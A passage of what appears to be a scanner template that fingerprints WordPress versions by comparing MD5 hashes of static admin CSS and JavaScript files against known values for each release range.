type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"f41708257e8e6bc89bd375f82a8bc290\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"e8da14cd4be51ae220b531dcd14d7069\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"eeff6a0a49c73df137e0829b232fafe2\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"a8f65f404867e7d00ef30c4312e4ae5a\" == md5(body))" - - type: dsl - name: 4.9.2 - 4.9.4 - dsl: - - "(\"3474da40a63cf7441990d7af14e1dd96\" == md5(body))" - - type: dsl - name: 4.9.5 - dsl: - - "(\"2a75a758f97514530f0ae7ba984e9392\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"6f94711934da6b3ffb9b7aa44c595613\" == md5(body))" - - type: dsl - name: 4.9.8 - 4.9.9 - dsl: - - "(\"714e9274f3615454701ea9ee0ced8b5f\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.2 - dsl: - - "(\"7b8cd77767df9b74c2ba9758a5ae61d4\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"3056f4e370a1881381f87d058a505e13\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"03b3fc0c51132338e6b04efe3111aac9\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"80412e2251dc758231d2aa30ece06d42\" == md5(body))" - - type: dsl - name: 5.2.1 - dsl: - - "(\"854e9fea900d9e1b9323337290511600\" == md5(body))" - - type: dsl - name: 5.2.2 - dsl: - - "(\"8429b24e45bab0f571f2899f40089316\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"db80bf8f1deb332d3449ed81457ba565\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"58d84231e24daae117fe2385566f19f1\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"6a5851a95ac74681b84c89f34a83d526\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.1 - dsl: - - "(\"4bf51bc15cee9b14c27cd2a228827864\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.3.6 - dsl: - - "(\"a4490a668e75cdfaa5d0155a15c2d785\" == md5(body))" - - type: dsl - name: 5.4.2 - 5.4.4 - dsl: - - "(\"d80fd8aacd4775600a95c8a725924c2c\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"7f8fceaf55013fd941fb68698f407de0\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2103d4b114317943ec992cb762a5b43a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/common.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"b1ccd63fd1eb7b7c83e0c18f4a41631e\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"19783c0c8c8225b3fc31ea04e77ee50a\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"2adb75111fe6bd2d079f1a4382e43806\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"b8f5ef44ca185e2efe7b8205a2e35e1a\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"920d13a170db44958b3e0a3eb6bbf65a\" == md5(body))" - - type: dsl - name: 4.9.2 - 4.9.4 - dsl: - - "(\"f66191b422f0fb03659565a9fe2cbf31\" == md5(body))" - - type: dsl - name: 4.9.5 - dsl: - - "(\"595620900f9d6ee0537856376b500bb6\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"f290461e922fb41355a1cce6d1afcae3\" == md5(body))" - - type: dsl - name: 4.9.8 - 4.9.9 - dsl: - - "(\"d0ab761a7e48baab74afdd85a669c9e6\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.2 - dsl: - - "(\"17f162d041245ca50ed4f8eda0d3938b\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"cfa9e1f2a74fb8c9181b1a4faffec319\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"acccbab4b6f7167f75de702337c15082\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"2922dadefceb4936fef52c2fd9eca7e5\" == md5(body))" - - type: dsl - name: 5.2.1 - dsl: - - "(\"0154ab68beb21987369fe4f9f96e505e\" == md5(body))" - - type: dsl - name: 5.2.2 - dsl: - - "(\"404c6d0aec7bd9536097b66367fe609c\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"df5accb5efc55900010fc8dbc7288c0d\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"673f08c43f68205d1be3c61e8e643ccb\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"e4c9d150e9d0879e6f4f49e8499db573\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.1 - dsl: - - "(\"87c166494be181c0191a2aa8f5353804\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.3.6 - dsl: - - "(\"ad5ad5176f246f2c063e6b17b204f6fa\" == md5(body))" - - type: dsl - name: 5.4.2 - 5.4.4 - dsl: - - "(\"27484d633876a355cfb93659f226c355\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"780232f685803f5815fbcc8cc34e6f51\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"9acd2c0bc2d9c3e1ae244b37a1c16093\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/common.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"94a8c9759cf395d67c51ad99801749b2\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"b1992b6de3600f82b893aa6123f2972d\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"81aef5364d1de5aff6e2f7577a161564\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"726ff561c2ff8ea1b521774e18fa6be4\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"cf2cfe5b33d2c6a1a2afd50128902698\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"f78ebe20922d0a67cacf2ec916d89e1c\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"6942f692b44491261619b43859b8acfc\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"64d0b35ed52e9b2c23e5e392a7a430b2\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"588b195e5c6ac9aedeaf5a8d15392cac\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"da4a644688036daca94c760935e9667f\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"e52c17a7a6b58bb9f34a9ee0b925dce2\" == md5(body))" - - type: dsl - name: 4.9.2 - 4.9.4 - dsl: - - "(\"5fff0139cf41e8f2bfc402c8bda13182\" == md5(body))" - - type: dsl - name: 4.9.5 - dsl: - - "(\"9d21197ec7821a31b6cb867a509eea42\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"fcd549c0099cc4b73431636d5b34a2d8\" == md5(body))" - - type: dsl - name: 4.9.8 - 4.9.9 - dsl: - - "(\"73f78da3cc978e1a179fb7972723a1e0\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.2 - dsl: - - "(\"9410a07983a1c5cbf0f46f54222ae03b\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"6488275ef0769671a1ee7f3aa57288dc\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"984d0a5c5d116af8a4004428f0b5ee20\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"7988ef149cc8447a3a47ae12832e5abb\" == md5(body))" - - type: dsl - name: 5.2.1 - dsl: - - "(\"3a83fc2978cd1dd143e2973281aaeb6c\" == md5(body))" - - type: dsl - name: 5.2.2 - dsl: - - "(\"f6e888d4a9f434e361e646d0b7d11864\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"8ac7ee2240fd68c28aff2ff4158fbc39\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"9cff57b3df1f72314b4f4fb3668c9fba\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"2561f3fa21e6a465078399f9a3495809\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.1 - dsl: - - "(\"19e7bae79deb7d7598d42ec0a1cf715c\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.3.6 - dsl: - - "(\"e573595eef2d3bfd7767fdec685b1bae\" == md5(body))" - - type: dsl - name: 5.4.2 - 5.4.4 - dsl: - - "(\"4213c7f0717c905c9cd12752a9b8358a\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"50d8c6430b9e115b2bf2a0047043b7d2\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2d54476191767139e8ae7aaef8b3653f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/post.js" - matchers: - - type: dsl - name: 4.7 - 4.9.5 - dsl: - - "(\"410fd99a0aca02dcf6abda8b98222d99\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"f973910442293f747aedd8df81542222\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"2113b842b04cb770f09f80b71b35bd41\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"c660f729afcf0339a26ad7cee25eb45b\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"b30a814a7fa9ea4b03498d7f4d8e3b2c\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"995f94db4b9e67b27b3d71ca72624988\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"24daf495d09243fe7a3eb040d58ddcc7\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"d4beb52b277333b38bf53fa07309f192\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"871f0866df7ba56493e97a1a21b82b53\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"6578ae8741421df2c6b352f92684140d\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"8bba20755890a66db03ed0d606e17c4c\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"3149dd38216585bd7d68e89da427cfb0\" == md5(body))" - - type: dsl - name: 3.5.1 - 3.5.2 - dsl: - - "(\"7270887faa737b6ab4012ae16e0d2ecf\" == md5(body))" - - type: dsl - name: 3.5 - dsl: - - "(\"455d1a15d2c2112242449ce6edb5ac14\" == md5(body))" - - type: dsl - name: 3.4.2 - dsl: - - "(\"8cb6604046ddf6f3ef9d6e1fcddd31c1\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.1 - dsl: - - "(\"b18907877b011f5bbbdb949f75a3dd75\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"c4daaa511f44a2df4ab86fce49eff839\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"890af0a8978150a6838937100d90e489\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"f00c5d495a40b9be6deb67c4c2ea8e74\" == md5(body))" - - type: dsl - name: 3.0.5 - 3.0.6 - dsl: - - "(\"0cefbed58bc2260d2f92560d50cee967\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.4 - dsl: - - "(\"b38b6b854829c6a3cde9450b0820feaa\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"c7229ea07e54d5a7a4f6eb5627e690de\" == md5(body))" - - type: dsl - name: 2.8.1 - 2.8.6 - dsl: - - "(\"88ce6f35b60890ede66b1ca4c39fc4af\" == md5(body))" - - type: dsl - name: 2.8 - dsl: - - "(\"e4f0fc3a74331d7d2060914068300ec0\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"bf5e7f1eebeddfa5b0e217bd868cd623\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"2fbacf0ddb5f88b962c3a1dbda73ca10\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"a34f1474e3a5ade6b4483bc307bfde84\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"020069f33ed66ea68f9067c596d137cb\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.0.11 - dsl: - - "(\"c80252996072ccb0aa20eb24bfc388e8\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"49b375e4fe6862c7d6b5445796fc11a5\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"9b5f5cfd0d4a6bb9104ba13a987f1616\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.3.6 - dsl: - - "(\"086a6977f592c2c633281623697b9c89\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"b2b269b59688458f3be7720f258419d1\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"23b646facdd6a9aa3e8a79809a0d4287\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/editor.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"acee57a19cda70bf397555354cb1c128\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"d5b03f5ca13605379b6c565ebfa55570\" == md5(body))" - - type: dsl - name: 4.6.1 - 4.6.20 - dsl: - - "(\"eeae1118610e5531c31ba2bcb9307e53\" == md5(body))" - - type: dsl - name: 4.6 - dsl: - - "(\"7f1d9aa97951aa4ef795807cacd48ed8\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"2b678b0930558d9605a9126e3e1e2aad\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"dcd4d53323e183c283c45480f37272f0\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"8df6a448a11dc26010e5e58ffd258ff3\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"bce0fcfa6d2d6f3e058c71e5830617ae\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"61c6df5b1e3a5cf6ebd565cb58f91e6e\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"18bff3de0535b966f8d7304edae11046\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"ca91741630f5a7f59a741e9f8b80f426\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"1c060d191ff63e841d8f72eacaf4a6bf\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"07e615ff39dbb16e59116aeff6905b43\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"f1ad6ac5d3f3f0ad4d5865c8b3e60195\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"1e949d2c91490fed06cb0b747b913872\" == md5(body))" - - type: dsl - name: 3.5.1 - 3.5.2 - dsl: - - "(\"190b8b303e731c8f9a6174f994b4b8ec\" == md5(body))" - - type: dsl - name: 3.5 - dsl: - - "(\"26c698cf4308f7411829719c0092e3ba\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"f928859bbdce98c97c2c54a4866fd298\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.5 - dsl: - - "(\"d93f9684a688e6b333732fc96a73ccd3\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"34785c29f6816b0e2def5d1425d684a4\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"e68c7549dca30ee2b36ec0e3eb6f60db\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"c1990e08d992a070008e812fd3431aa7\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"182c51951e8c1266613ae4932d3bec01\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"ebc3225a9e7f4673168062c05bed5c71\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.4.4 - dsl: - - "(\"7225426df452ba57c476c9c185a39884\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"823eee9bf2f9fac24c84264408bd143c\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"6f4cc8a85c30c26c493d9529dce507e7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/dashboard-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"3027a880d7e45acd4aacde8b90570904\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"d3c3fcc9f814d55d40f611bf5680e0b6\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"e8fe2ba8fb7d0d6cfe0251cb256b30e7\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"a8b46397a7fedad016bf5bbb35e65e78\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"980373b7e45d9657f82af1dbc31be9e9\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"ebb761dcfd6cb62a9983a41f6c69266a\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"07decee960d22fca5b6e94eaa647956e\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"604d702e0a430f86e7bcb8b21279b43a\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"699d46e0f1942549db67dfc2d3331ac7\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"059696f05866c8f228b4180b3e883a25\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"13a3866b367a914f06e876ce28a0c2df\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"6f15ff7135a5d85a53cdbd4631b6f575\" == md5(body))" - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"81238c176822f1efd9d121eea5fbb3d7\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"9051793fd0506aa6b1b6a0247ea9794c\" == md5(body))" - - type: dsl - name: 2.6 - dsl: - - "(\"e1532114021a77a683c7415ec4e29db3\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"7119570d5ac7ab433dfc47504ba63306\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.7 - dsl: - - "(\"96d44cd1c8b67c6c75fe69ca710f13e1\" == md5(body))" - - type: dsl - name: 4.9.8 - dsl: - - "(\"513061f4002f58bdf2078417a6a2de0c\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"b4dcdb2ce9b2b421061b957711fcc5ef\" == md5(body))" - - type: dsl - name: 4.9.9 - dsl: - - "(\"8d8a310e7026d8f2e85d1ca298e847df\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"09cbf2e1b4d252605942102d50fc8669\" == md5(body))" - - type: dsl - name: 4.9.10 - 4.9.16 - dsl: - - "(\"5f811fc388851e1e47ec039e88788e46\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"bb6cb59535e109ed4b6114e8fbf9a6b3\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"b125dfd27dc6d691dec23472c501f331\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"efe7d56a14eb97150e1b3895ff0912aa\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"3a6681edc6beee72f24052981ffa455c\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"bd5147b8b23d61b9c5eb0291f6ef5882\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"f2f1451cae3fbd07ed005df071713499\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/edit-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"0afe92ecadd20642405e068c198d81e5\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.19 - dsl: - - "(\"6f48ef6a45393efdfdfbe8f8ed6a2506\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"66ea900f920a0f7b94920ef018724264\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"5ba4e14b2d9cb19fb65b7cfa7fb5b9aa\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"617d5f0599c159412e1a3421d703f703\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"9eebc5ec4f78378537ea76f5ada4ea51\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"418e0259481989778b697f1a65f49a66\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"712664ed4085240ed13d04f257c48cf8\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"be99c57389c7d414f0f58f33678a0824\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"1feb400a4e9983895a55cf7aa0078b07\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"fc68bb88fbe1970c5f2c6ba9381896e4\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"2d5e5d35c3f1046f92c6bd0c3ad5e2be\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"d96ee1aa49292d90a5d085764b1d33db\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"e824bb32e5294e03b23fdb2bc0ce2fcf\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"ac500823d8fc685bc093f052adf69020\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"ef08248e4b4503b682c13cded1b0647a\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"0b55e6d96f87a218a1000470861c01bb\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"77740c8d0bc7f991d1d8b32bde522ad8\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"b887a122adf7d35bc22e326f1d81dae2\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"6303281815f53c3c71c82bc776df6dc8\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"89ecbd877f22c7a4c4957d57fd27af25\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"aae0e1432448480894bf46b4af05127e\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.3.6 - dsl: - - "(\"9aa9e8812ca07ae32b1a696c9eeb8f9b\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"1881393ac48ad40d1afcdf7a9f25c8ef\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"c457a0d561db7907bb16385e74bc2167\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/edit.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"120fb112fa760baf693787a8bb8e0d16\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.19 - dsl: - - "(\"0902edb1b33e62df3b89e42ee0fb9284\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"38a79bf55e7a3b6ccba3b242e9b2de00\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"55238fac829b69520b226a3e70639cbc\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"216986c56836217f278adc7452762759\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"8c078f5f2fb09c39160fc5097196f668\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"6292dae0a22fbb3114f650ad14eb0633\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"cf0e90a5b0c60c057ee531590e2a1ea5\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"dca1f2c9b549b0c85b279a27e4adc142\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"4f2215bdabcb2b4b32f3e62f1c913b12\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"54fc1f4a96ac646bf7c4a971e786d3cb\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"3260d285fda6904e237707fae35f2a5c\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"8ac09095ebcc8c9ffcf6593c6f4118f7\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"520f38940371585ea1be3adbe7ff9d37\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"a1c1f8d9141979d6cec1eb4e73e49ad1\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"6bbb337fa6d1a1f211d0886806b10974\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"857ee04675bddc934ddeea341b86c976\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"f082f7c7ff8deaf5e3ddbc77b37c6396\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"d86c1fb98ee6afdd746b95f4346347c6\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"f7c7964c2816428bf5404d506720cf67\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"dd14a6b9955fc92fab88fcbc6514925d\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"2e3fc0eacf4c93d49e1c6a1b2e6778f8\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.3.6 - dsl: - - "(\"0b4b9fa4c732d440c63e7a7c292c67e5\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"11eebad835b22f5e58524a023f7202ac\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2469caff3076ab9a6f6e27d191a5ff39\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/customize-nav-menus.min.js" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"adc6503f011d23207fefb4ba2aefeb24\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"2ab2b22000b57942c42134efe73db683\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"38f10b79fbbffc9e741893014ea002b4\" == md5(body))" - - type: dsl - name: 4.7.3 - dsl: - - "(\"ecb1fddddee46cdebda2a0421aadeb63\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.2 - dsl: - - "(\"676f559c24dcc8691869e86be3cf72c0\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"bc754d8cb65e8b7cb92f6ec38f5b3632\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"db180e593c9cf471de955acaeeeab54a\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"bbf4734a3338cf875235a5ada02c41b4\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"7299c58bcace8ce8a56b057b4656bc75\" == md5(body))" - - type: dsl - name: 4.3.2 - 4.3.25 - dsl: - - "(\"0bc26c3f8248b01d3431b73ac6d886a7\" == md5(body))" - - type: dsl - name: 4.3.1 - dsl: - - "(\"b19dec30505b46afbc06a72e9fc175e6\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"0495076f6aad785775658ecdfd5e939e\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"c823f128adf2d3634b7d3ff5ebec04fe\" == md5(body))" - - type: dsl - name: 4.9.5 - 5.0.11 - dsl: - - "(\"b6bd555ecefea0378f027c9441a243e3\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.2 - dsl: - - "(\"eaeb1c4c7104fb2fb2ac3fbd22a665b5\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"ac8716e6b7dfb4c763f73c94cb94a597\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"e099bc0d6b8f5ec1bbe943f308e658a1\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"465011bcb652bfa98c9b63d205eb5273\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"a1cc633332ed9f999720fe73d910315b\" == md5(body))" - - method: GET - path: - - 